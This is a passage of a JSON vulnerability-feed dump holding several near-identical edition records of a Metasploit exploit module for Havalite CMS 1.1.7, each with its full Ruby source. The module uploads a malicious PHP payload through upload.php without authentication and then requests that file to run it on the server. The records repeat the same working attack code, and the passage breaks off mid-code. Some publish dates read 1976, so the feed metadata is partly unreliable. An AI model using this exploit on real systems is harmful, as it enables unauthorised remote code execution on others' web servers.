module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-16T03:45:49", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-03-16T03:45:49", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-16T03:45:49", "differentElements": ["modified", "published"], "edition": 26}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-16T15:49:35", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-03-16T15:49:35", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-16T15:49:35", "differentElements": ["modified", "published"], "edition": 27}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-16T17:49:46", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-16T17:49:46", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-16T17:49:46", "differentElements": ["modified", "published"], "edition": 28}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-22T07:52:47", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-22T07:52:47", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-22T07:52:47", "differentElements": ["modified", "published"], "edition": 29}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-22T11:44:33", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-22T11:44:33", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-22T11:44:33", "differentElements": ["modified", "published"], "edition": 30}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-24T09:55:02", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-24T09:55:02", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-24T09:55:02", "differentElements": ["modified", "published"], "edition": 31}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-24T15:57:56", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-24T15:57:56", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
